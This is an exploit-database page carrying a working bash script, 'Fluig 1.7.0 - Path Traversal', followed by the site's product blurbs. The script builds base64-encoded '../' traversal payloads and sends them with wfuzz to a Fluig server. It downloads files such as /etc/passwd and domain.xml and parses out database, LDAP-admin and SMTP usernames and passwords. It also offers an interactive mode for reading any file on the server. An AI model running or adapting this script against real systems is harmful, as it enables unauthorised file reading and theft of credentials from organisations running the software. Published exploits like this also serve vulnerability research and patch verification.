Vulners
Lucene search
Fluig 1.7.0 - Path Traversal
# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124
#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --
function create-payload {
> wordlist.txt
count=1
while [[ $count -le $npayload ]]; do
# WINDOWS PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
# LINUX PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
count=$[$count + 1]
done
}
function manual-mode {
while :; do
echo
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
echo
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"
echo -e "\033[0;32m -[ target - Set a target\033[0m"
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"
echo
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
if [[ $path == 'info' ]]; then
clear
cat banner
domain-xml
elif [[ $path == 'clear' ]]; then
clear
elif [[ $path == 'target' ]]; then
XmlPayload=''
echo
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
enum
else
echo
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
DirPath=$(head -1 payload.txt)
if [[ $DirPath == '' ]]; then
echo
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
else
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
echo
echo -e '\033[0;31m'$path'\033[0m'
echo
cat report/$mdr/$mkfile
echo
pwd=$(pwd)
echo
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
fi
fi
done
}
function domain-xml {
domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
echo
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
echo
echo -e ' \033[0;33m[!] INFORMATION\033[0m'
echo
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
echo $XmlPayload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $XmlPayload
echo
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
echo
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'
echo
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
echo
manual-mode
fi
}
function enum {
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
mkdir -p report/$mdr
if [[ $url == '' ]]; then
clear
cat banner
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
manual-mode
elif [[ $npayload == '' ]]; then
npayload=25
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
echo
create-payload
else
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
create-payload
fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'
echo
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
echo
manual-mode
else
param=$(echo $payload | base64 -d | cut -d '.' -f1)
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
echo $payload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $payload
echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
manual-mode
else
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
manual-mode
fi
}
enumData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2021 00:00Current
8.9High risk
Vulners AI Score8.9